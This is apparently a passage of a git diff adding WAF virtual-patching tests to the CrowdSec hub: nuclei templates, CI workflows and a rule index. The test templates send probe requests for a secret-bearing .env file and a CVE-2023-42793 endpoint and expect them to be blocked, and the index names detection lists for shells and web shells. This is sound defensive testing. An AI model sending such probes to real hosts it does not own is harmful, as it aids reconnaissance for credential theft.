+ test
+
+
+ ------WebKitFormBoundary5WJ61X4PRwyYKlip
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - 'status_code_1 == 403'
+ - 'status_code_2 == 403'
+ - 'status_code_3 == 403'
diff --git a/.appsec-tests/CVE-2023-50164/config.yaml b/.appsec-tests/CVE-2023-50164/config.yaml
new file mode 100644
index 00000000000..3bac2e3a4b7
--- /dev/null
+++ b/.appsec-tests/CVE-2023-50164/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml
+nuclei_template: CVE-2023-50164.yaml
diff --git a/.appsec-tests/cve-2023-42793/config.yaml b/.appsec-tests/cve-2023-42793/config.yaml
new file mode 100644
index 00000000000..0f351751bcf
--- /dev/null
+++ b/.appsec-tests/cve-2023-42793/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml
+nuclei_template: cve-2023-42793.yaml
diff --git a/.appsec-tests/cve-2023-42793/cve-2023-42793.yaml b/.appsec-tests/cve-2023-42793/cve-2023-42793.yaml
new file mode 100644
index 00000000000..ce0505da035
--- /dev/null
+++ b/.appsec-tests/cve-2023-42793/cve-2023-42793.yaml
@@ -0,0 +1,22 @@
+id: cve-2023-42793
+info:
+ name: cve-2023-42793
+ author: crowdsec
+ severity: medium
+ description: |
+ cve-2023-42793 testing
+ tags: appsec-testing
+
+http:
+ - raw:
+ - |
+ GET /rpc2 HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
+
diff --git a/.appsec-tests/template_acquis.yaml b/.appsec-tests/template_acquis.yaml
new file mode 100644
index 00000000000..5aba47f6dbb
--- /dev/null
+++ b/.appsec-tests/template_acquis.yaml
@@ -0,0 +1,7 @@
+listen_addr: 127.0.0.1:4241
+source: appsec
+log_level: debug
+labels:
+ type: appsec
+#appsec_config: appsec-test
+appsec_config_path: ./runtime/appsec-configs/config.yaml
\ No newline at end of file
diff --git a/.appsec-tests/template_appsec-profile.yaml b/.appsec-tests/template_appsec-profile.yaml
new file mode 100644
index 00000000000..f0f976df3b6
--- /dev/null
+++ b/.appsec-tests/template_appsec-profile.yaml
@@ -0,0 +1,5 @@
+name: appsec-test
+log_level: debug
+inband_rules:
+ - "crowdsecurity/*" # all rules
+default_remediation: ban
diff --git a/.appsec-tests/template_config.yaml b/.appsec-tests/template_config.yaml
new file mode 100644
index 00000000000..c443955ecab
--- /dev/null
+++ b/.appsec-tests/template_config.yaml
@@ -0,0 +1,48 @@
+common:
+ daemonize: false
+ pid_dir: ./runtime
+ log_media: file
+ log_level: info
+ log_dir: ./runtime/log/
+ working_dir: .
+config_paths:
+ config_dir: ./runtime/
+ data_dir: ./runtime/data/
+ simulation_path: ./runtime/simulation.yaml
+ hub_dir: ./runtime/hub/
+ index_path: ./runtime/hub/.index.json
+ notification_dir: ./runtime/notifications/
+ plugin_dir: /usr/local/lib/crowdsec/plugins/
+crowdsec_service:
+ parser_routines: 1
+ acquisition_path: ./runtime/acquis.yaml
+cscli:
+ output: human
+db_config:
+ log_level: info
+ type: sqlite
+ db_path: ./runtime/data/crowdsec.db
+ #user:
+ #password:
+ #db_name:
+ #host:
+ #port:
+ flush:
+ max_items: 5000
+ max_age: 7d
+plugin_config:
+ user: nobody # plugin process would be ran on behalf of this user
+ group: nogroup # plugin process would be ran on behalf of this group
+api:
+ client:
+ insecure_skip_verify: false
+ credentials_path: ./runtime/local_api_credentials.yaml
+ server:
+ log_level: info
+ listen_uri: 127.0.0.1:8181
+ profiles_path: ./runtime/profiles.yaml
+prometheus:
+ enabled: true
+ level: full
+ listen_addr: 127.0.0.1
+ listen_port: 6060
diff --git a/.appsec-tests/template_profiles.yaml b/.appsec-tests/template_profiles.yaml
new file mode 100644
index 00000000000..ad917ff252d
--- /dev/null
+++ b/.appsec-tests/template_profiles.yaml
@@ -0,0 +1,13 @@
+name: default_ip_remediation
+#debug: true
+filters:
+ - Alert.Remediation == true && Alert.GetScope() == "Ip"
+decisions:
+ - type: ban
+ duration: 4h
+# notifications:
+# - slack_default # Set the webhook in /etc/crowdsec/notifications/slack.yaml before enabling this.
+# - splunk_default # Set the splunk url and token in /etc/crowdsec/notifications/splunk.yaml before enabling this.
+# - http_default # Set the required http parameters in /etc/crowdsec/notifications/http.yaml before enabling this.
+on_success: break
+
diff --git a/.appsec-tests/template_simulation.yaml b/.appsec-tests/template_simulation.yaml
new file mode 100644
index 00000000000..e9c68999350
--- /dev/null
+++ b/.appsec-tests/template_simulation.yaml
@@ -0,0 +1,4 @@
+simulation: off
+# exclusions:
+# - crowdsecurity/ssh-bf
+
\ No newline at end of file
diff --git a/.appsec-tests/vpatch-env-access/config.yaml b/.appsec-tests/vpatch-env-access/config.yaml
new file mode 100644
index 00000000000..e6bc95b6212
--- /dev/null
+++ b/.appsec-tests/vpatch-env-access/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-env-access.yaml
+nuclei_template: vpatch-env-access.yaml
diff --git a/.appsec-tests/vpatch-env-access/vpatch-env-access.yaml b/.appsec-tests/vpatch-env-access/vpatch-env-access.yaml
new file mode 100755
index 00000000000..65e84701967
--- /dev/null
+++ b/.appsec-tests/vpatch-env-access/vpatch-env-access.yaml
@@ -0,0 +1,24 @@
+id: vpatch-env-access
+info:
+ name: vpatch-env-access
+ author: crowdsec
+ severity: info
+ description: vpatch-env-access testing
+ tags: appsec-testing
+http:
+ - raw:
+ - |
+ GET /foo/bar/.env HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET /foo/bar/ HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - 'status_code_1 == 403'
+ - 'status_code_2 == 404'
diff --git a/.github/workflows/appsec_vpatch_lint.yaml b/.github/workflows/appsec_vpatch_lint.yaml
new file mode 100644
index 00000000000..35560902077
--- /dev/null
+++ b/.github/workflows/appsec_vpatch_lint.yaml
@@ -0,0 +1,40 @@
+name: Vpatch collection lint
+on:
+ push:
+ paths:
+ - "appsec-rules/**.yaml"
+ - "appsec-rules/**.yml"
+ - "scripts/**.py"
+ - ".github/workflows/appsec_vpatch_lint.yaml"
+ - "./collections/crowdsecurity/appsec-virtual-patching.yaml"
+
+jobs:
+ update-taxonomy:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/setup-python@v4
+ with:
+ python-version: "3.10"
+ - uses: actions/checkout@v1
+ - name: Get changed files
+ run: |
+ changed_files=$(git diff-tree --no-commit-id --name-only -r $GITHUB_SHA | tr '\n' ',' | sed 's/,$/\n/')
+ echo "changed_files=${changed_files}" >> $GITHUB_ENV
+ - name: Create local changes
+ env:
+ AUTHOR: ${{ github.actor }}
+ run: |
+ pip install requests pyyaml mdutils
+ python ./scripts/appsec_vpatch_lint.py -e appsec_vpatch_cve_error.md --hub ./
+ [ -f "appsec_vpatch_cve_error.md" ] && echo "taxonomy_errors=1" >> $GITHUB_ENV || echo "taxonomy_errors=0" >> $GITHUB_ENV
+ - uses: jwalton/gh-find-current-pr@v1
+ id: findPr
+ with:
+ state: open
+ - name: Comment PR if errors
+ if: ${{ (env.taxonomy_errors == '1') && (github.event_name == 'push') && (github.ref != 'refs/heads/master') }}
+ uses: thollander/actions-comment-pull-request@v2
+ with:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ filePath: appsec_vpatch_cve_error.md
+ pr_number: ${{ steps.findPr.outputs.pr }}
diff --git a/.github/workflows/test_appsec_rules.yaml b/.github/workflows/test_appsec_rules.yaml
new file mode 100644
index 00000000000..6770b320e2d
--- /dev/null
+++ b/.github/workflows/test_appsec_rules.yaml
@@ -0,0 +1,76 @@
+name: Appsec Rules Tests
+on:
+ pull_request:
+ branches: [ master ]
+ paths:
+ - 'appsec-configs/**.yaml'
+ - 'appsec-configs/**.yml'
+ - 'appsec-rules/**.yaml'
+ - 'appsec-rules/**.yml'
+ - '.github/workflows/test_appsec_rules.yaml'
+ - '.appsec-tests/**'
+ push:
+ branches: [ master ]
+ paths:
+ - 'appsec-configs/**.yaml'
+ - 'appsec-configs/**.yml'
+ - 'appsec-rules/**.yaml'
+ - 'appsec-rules/**.yml'
+ - '.github/workflows/test_appsec_rules.yaml'
+ - '.appsec-tests/**'
+
+jobs:
+ run-hub-tests:
+ runs-on: ubuntu-20.04
+ steps:
+ - name: Check out code into the Go module directory
+ uses: actions/checkout@v4
+ - uses: actions/setup-go@v4
+ with:
+ go-version: '1.21'
+ - name: Install requirements
+ run: |
+ sudo apt install libre2-dev
+ go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
+ - name: Install CrowdSec
+ run: |
+ git clone https://github.com/crowdsecurity/crowdsec.git
+ cd crowdsec
+ BUILD_STATIC=1 make release
+ cd crowdsec-v*
+ sudo ./wizard.sh --unattended
+ - name: Install NGINX
+ run: |
+ sudo apt install nginx
+ - name: Install CrowdSec NGINX Bouncer
+ run: |
+ git clone https://github.com/crowdsecurity/cs-nginx-bouncer.git
+ cd cs-nginx-bouncer/
+ make release
+ tar xzvf crowdsec-nginx-bouncer.tgz
+ cd crowdsec-nginx-bouncer-v*
+ sudo ./install.sh -y
+ - name: Setup NGINX Bouncer API key
+ run: |
+ sudo cscli bouncers add hubtestAppsec -k "this_is_a_bad_password"
+ sudo sed -i 's/API_KEY=.*$/API_KEY=this_is_a_bad_password/' /etc/crowdsec/bouncers/crowdsec-nginx-bouncer.conf
+ echo "APPSEC_URL=http://127.0.0.1:4241" | sudo tee -a /etc/crowdsec/bouncers/crowdsec-nginx-bouncer.conf
+ sudo systemctl restart nginx
+ - name: run tests on last crowdsec tag
+ run: |
+ cscli hubtest run --all --appsec --debug
+ echo "APPSEC_RULE_COV=$(cscli hubtest coverage --appsec --percent | cut -d '=' -f2)" >> $GITHUB_ENV
+ APPSEC_RULE_COV_NUMBER=$(cscli hubtest coverage --appsec --percent | cut -d '=' -f2 | tr -d '%' | tr -d '[[:space:]]')
+ echo "APPSEC_RULE_BADGE_COLOR=$(if [ "$APPSEC_RULE_COV_NUMBER" -lt "70" ]; then echo 'red'; else echo 'green'; fi)" >> $GITHUB_ENV
+ - name: Create appsec badge
+ uses: schneegans/dynamic-badges-action@v1.1.0
+ #if: ${{ github.ref == 'refs/heads/master' }}
+ if: false
+ with:
+ auth: ${{ secrets.GIST_BADGES_SECRET }}
+ gistID: ${{ secrets.GIST_BADGES_ID }}
+ filename: hub_appsec_badge.json
+ label: Hub Appsec
+ message: ${{ env.APPSEC_RULE_COV }}
+ color: ${{ env.APPSEC_RULE_BADGE_COLOR }}
+
diff --git a/.github/workflows/update-index.yml b/.github/workflows/update-index.yml
index 3fc0a5c7beb..5154deb5d86 100644
--- a/.github/workflows/update-index.yml
+++ b/.github/workflows/update-index.yml
@@ -3,21 +3,26 @@ name: Update index
on:
push:
paths:
- - "scenarios/**.yaml"
- - "parsers/**.yaml"
- - "postoverflows/**.yaml"
- - "collections/**.yaml"
- - "scenarios/**.yml"
- - "parsers/**.yml"
- - "postoverflows/**.yml"
- - "collections/**.yml"
- - "scenarios/**.md"
- - "parsers/**.md"
- - "postoverflows/**.md"
- - "collections/**.md"
- - ".github/workflows/update-index.yml"
+ - 'scenarios/**.yaml'
+ - 'parsers/**.yaml'
+ - 'postoverflows/**.yaml'
+ - 'collections/**.yaml'
+ - 'appsec-rules/**.yaml'
+ - 'appsec-configs/**.yaml'
+ - 'scenarios/**.yml'
+ - 'parsers/**.yml'
+ - 'postoverflows/**.yml'
+ - 'collections/**.yml'
+ - 'appsec-rules/**.yml'
+ - 'appsec-configs/**.yml'
+ - 'scenarios/**.md'
+ - 'parsers/**.md'
+ - 'postoverflows/**.md'
+ - 'collections/**.md'
+ - 'appsec-rules/**.md'
+ - 'appsec-configs/**.md'
+ - '.github/workflows/update-index.yml'
- "*.go"
-
jobs:
build:
runs-on: ubuntu-latest
diff --git a/.github/workflows/update_taxonomy.yaml b/.github/workflows/update_taxonomy.yaml
index 5c989451ae9..4a3b83ceeda 100644
--- a/.github/workflows/update_taxonomy.yaml
+++ b/.github/workflows/update_taxonomy.yaml
@@ -5,6 +5,8 @@ on:
paths:
- "scenarios/**.yaml"
- "scenarios/**.yml"
+ - "appsec-rules/**.yaml"
+ - "appsec-rules/**.yml"
- "scripts/**.py"
- ".github/workflows/update_taxonomy.yaml"
- "scripts/.scenariosignore"
diff --git a/.gitignore b/.gitignore
index cf5d8960d4f..c7ef590bf83 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,6 +8,9 @@
.tests/*/parser-dump.yaml
.tests/*/runtime/*
+.appsec-tests/*/results/*
+.appsec-tests/*/runtime/*
+
## tmp files
taxonomy/scenario_taxonomy_errors.md
diff --git a/.index.json b/.index.json
index 863d7aec119..cefc43764ea 100644
--- a/.index.json
+++ b/.index.json
@@ -1,4 +1,717 @@
{
+ "appsec-configs": {
+ "crowdsecurity/crs": {
+ "path": "appsec-configs/crowdsecurity/crs.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "e9cbc67cae76d60468e40f54db62c97157e203bc06c412239695c843ef98f987",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "fd41693ebf881d1cb561cd6a163c9da47c50c480829efe4ddca74f6ec3847855",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS9jcnMKZGVmYXVsdF9yZW1lZGlhdGlvbjogYmFuCiNsb2dfbGV2ZWw6IGRlYnVnCm91dG9mYmFuZF9ydWxlczoKIC0gY3Jvd2RzZWN1cml0eS9jcnM=",
+ "author": "crowdsecurity",
+ "labels": null
+ },
+ "crowdsecurity/virtual-patching": {
+ "path": "appsec-configs/crowdsecurity/virtual-patching.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "48a765ded560cf4d8bb405e563411245156b6b2c2fef09e5492e6270f5337bff",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "0bf15e1ebed4c94933bf9407d616be22121733ddd327710f7f5b79ec70d52085",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "e93cc5d63aae3a83794b0f6b1e41566f53fae059e6044a9519f02256fa6e2adf",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92aXJ0dWFsLXBhdGNoaW5nCmRlZmF1bHRfcmVtZWRpYXRpb246IGJhbgojbG9nX2xldmVsOiBkZWJ1ZwppbmJhbmRfcnVsZXM6CiAtIGNyb3dkc2VjdXJpdHkvYmFzZS1jb25maWcgCiAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLSoKIyBpbmJhbmRfb3B0aW9uczoKIyAgZGlzYWJsZV9ib2R5X2luc3BlY3Rpb246IHRydWUK",
+ "author": "crowdsecurity",
+ "labels": null
+ }
+ },
+ "appsec-rules": {
+ "crowdsecurity/base-config": {
+ "path": "appsec-rules/crowdsecurity/base-config.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "5ef93f4b19a028f2415afaf570df4d20a5f6038fa94cc990a387662303c2ef20",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS9iYXNlLWNvbmZpZwojIyMjIFRoaXMgZmlsZSBpcyBpbnRlbmRlZCB0byBwcm92aWRlIGEgYmFzaWMgY29uZmlndXJhdGlvbiBmb3IgY29yYXphOgojIyMjIC0gU2V0IHRoZSBib2R5IHByb2Nlc3NvcnMgYmFzZWQgb24gdGhlIGNvbnRlbnQtdHlwZQoKc2VjbGFuZ19ydWxlczoKIC0gU2VjcnVsZSBSRVFVRVNUX0hFQURFUlM6Q29udGVudC1UeXBlICJAcnggXmFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIgImlkOjEwMCxwaGFzZToxLHBhc3Msbm9sb2csbm9hdWRpdGxvZyxjdGw6cmVxdWVzdEJvZHlQcm9jZXNzb3I9VVJMRU5DT0RFRCIKIC0gU2VjcnVsZSBSRVFVRVNUX0hFQURFUlM6Q29udGVudC1UeXBlICJAcnggXm11bHRpcGFydC9mb3JtLWRhdGEiICJpZDoxMDEscGhhc2U6MSxwYXNzLG5vbG9nLG5vYXVkaXRsb2csY3RsOnJlcXVlc3RCb2R5UHJvY2Vzc29yPU1VTFRJUEFSVCIKIC0gU2VjcnVsZSBSRVFVRVNUX0hFQURFUlM6Q29udGVudC1UeXBlICJAcnggXmFwcGxpY2F0aW9uL3htbCIgImlkOjEwMixwaGFzZToxLHBhc3Msbm9sb2csbm9hdWRpdGxvZyxjdGw6cmVxdWVzdEJvZHlQcm9jZXNzb3I9WE1MIgogLSBTZWNydWxlIFJFUVVFU1RfSEVBREVSUzpDb250ZW50LVR5cGUgIkByeCBeYXBwbGljYXRpb24vanNvbiIgImlkOjEwMyxwaGFzZToxLHBhc3Msbm9sb2csbm9hdWRpdGxvZyxjdGw6cmVxdWVzdEJvZHlQcm9jZXNzb3I9SlNPTiIKIC0gU2VjcnVsZSBSRVFVRVNUX0hFQURFUlM6Q29udGVudC1UeXBlICJAcnggXnRleHQveG1sIiAiaWQ6MTA0LHBoYXNlOjEscGFzcyxub2xvZyxub2F1ZGl0bG9nLGN0bDpyZXF1ZXN0Qm9keVByb2Nlc3Nvcj1YTUwiCiAtIFNlY1J1bGUgUkVRQk9EWV9QUk9DRVNTT1IgIiFAcnggKD86VVJMRU5DT0RFRHxNVUxUSVBBUlR8WE1MfEpTT04pIiAiaWQ6MTA1LHBoYXNlOjEscGFzcyxub2xvZyxub2F1ZGl0bG9nLGN0bDpyZXF1ZXN0Qm9keVByb2Nlc3Nvcj1SQVciICNVc2Ugb3VyIGN1c3RvbSBSQVcgYm9keSBwcm9jZXNzb3IsIGp1c3QgdG8gaGF2ZSBSRVFVRVNUX0JPRFkgc2V0Cg==",
+ "author": "crowdsecurity",
+ "labels": null
+ },
+ "crowdsecurity/crs": {
+ "path": "appsec-rules/crowdsecurity/crs.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "786fe3341c0f0a813eb57b7780620181686081e0f181515509290f2e8c042f0b",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "19d216b68b3de8a9c03e4d6644f578520b3673096ef55da6d77bf40902a36cab",
+ "deprecated": false
+ }
+ },
+ "content": "name: crowdsecurity/crs
seclang_rules:
 - SecRuleEngine On
 - SecRequestBodyAccess On
seclang_files_rules:
 - crs-setup.conf
 - REQUEST-901-INITIALIZATION.conf
 - REQUEST-905-COMMON-EXCEPTIONS.conf
 - REQUEST-911-METHOD-ENFORCEMENT.conf
 - REQUEST-913-SCANNER-DETECTION.conf
 - REQUEST-920-PROTOCOL-ENFORCEMENT.conf
 - REQUEST-921-PROTOCOL-ATTACK.conf
 - REQUEST-922-MULTIPART-ATTACK.conf
 - REQUEST-930-APPLICATION-ATTACK-LFI.conf
 - REQUEST-931-APPLICATION-ATTACK-RFI.conf
 - REQUEST-932-APPLICATION-ATTACK-RCE.conf
 - REQUEST-933-APPLICATION-ATTACK-PHP.conf
 - REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
 - REQUEST-941-APPLICATION-ATTACK-XSS.conf
 - REQUEST-942-APPLICATION-ATTACK-SQLI.conf
 - REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
 - REQUEST-944-APPLICATION-ATTACK-JAVA.conf
 - REQUEST-949-BLOCKING-EVALUATION.conf
 - RESPONSE-950-DATA-LEAKAGES.conf
 - RESPONSE-951-DATA-LEAKAGES-SQL.conf
 - RESPONSE-952-DATA-LEAKAGES-JAVA.conf
 - RESPONSE-953-DATA-LEAKAGES-PHP.conf
 - RESPONSE-954-DATA-LEAKAGES-IIS.conf
 - RESPONSE-955-WEB-SHELLS.conf
 - RESPONSE-959-BLOCKING-EVALUATION.conf
 - RESPONSE-980-CORRELATION.conf

data:
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/crs-setup.conf
    dest_file: crs-setup.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-901-INITIALIZATION.conf
    dest_file: REQUEST-901-INITIALIZATION.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-905-COMMON-EXCEPTIONS.conf
    dest_file: REQUEST-905-COMMON-EXCEPTIONS.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-911-METHOD-ENFORCEMENT.conf
    dest_file: REQUEST-911-METHOD-ENFORCEMENT.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-913-SCANNER-DETECTION.conf
    dest_file: REQUEST-913-SCANNER-DETECTION.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
    dest_file: REQUEST-920-PROTOCOL-ENFORCEMENT.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-921-PROTOCOL-ATTACK.conf
    dest_file: REQUEST-921-PROTOCOL-ATTACK.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-922-MULTIPART-ATTACK.conf
    dest_file: REQUEST-922-MULTIPART-ATTACK.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf
    dest_file: REQUEST-930-APPLICATION-ATTACK-LFI.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
    dest_file: REQUEST-931-APPLICATION-ATTACK-RFI.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
    dest_file: REQUEST-932-APPLICATION-ATTACK-RCE.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
    dest_file: REQUEST-933-APPLICATION-ATTACK-PHP.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
    dest_file: REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
    dest_file: REQUEST-941-APPLICATION-ATTACK-XSS.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
    dest_file: REQUEST-942-APPLICATION-ATTACK-SQLI.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
    dest_file: REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
    dest_file: REQUEST-944-APPLICATION-ATTACK-JAVA.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-949-BLOCKING-EVALUATION.conf
    dest_file: REQUEST-949-BLOCKING-EVALUATION.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-950-DATA-LEAKAGES.conf
    dest_file: RESPONSE-950-DATA-LEAKAGES.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf
    dest_file: RESPONSE-951-DATA-LEAKAGES-SQL.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
    dest_file: RESPONSE-952-DATA-LEAKAGES-JAVA.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf
    dest_file: RESPONSE-953-DATA-LEAKAGES-PHP.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf
    dest_file: RESPONSE-954-DATA-LEAKAGES-IIS.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-955-WEB-SHELLS.conf
    dest_file: RESPONSE-955-WEB-SHELLS.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-959-BLOCKING-EVALUATION.conf
    dest_file: RESPONSE-959-BLOCKING-EVALUATION.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-980-CORRELATION.conf
    dest_file: RESPONSE-980-CORRELATION.conf
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/crawlers-user-agents.data
    dest_file: crawlers-user-agents.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/iis-errors.data
    dest_file: iis-errors.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-classes.data
    dest_file: java-classes.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-code-leakages.data
    dest_file: java-code-leakages.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-errors.data
    dest_file: java-errors.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/lfi-os-files.data
    dest_file: lfi-os-files.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-config-directives.data
    dest_file: php-config-directives.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-errors.data
    dest_file: php-errors.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-errors-pl2.data
    dest_file: php-errors-pl2.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-function-names-933150.data
    dest_file: php-function-names-933150.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-function-names-933151.data
    dest_file: php-function-names-933151.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-variables.data
    dest_file: php-variables.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/restricted-files.data
    dest_file: restricted-files.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/restricted-upload.data
    dest_file: restricted-upload.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-headers.data
    dest_file: scanners-headers.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-urls.data
    dest_file: scanners-urls.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-user-agents.data
    dest_file: scanners-user-agents.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scripting-user-agents.data
    dest_file: scripting-user-agents.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/sql-errors.data
    dest_file: sql-errors.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/ssrf.data
    dest_file: ssrf.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/unix-shell.data
    dest_file: unix-shell.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/web-shells-php.data
    dest_file: web-shells-php.data
    type: modsec
  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/windows-powershell-commands.data
    dest_file: windows-powershell-commands.data
    type: modsec",
+ "author": "crowdsecurity",
+ "labels": null
+ },
+ "crowdsecurity/vpatch-CVE-2017-9841": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "0737417a66c5327708f6eff4392a4461002592fabcda6cdbdaa4143bce185503",
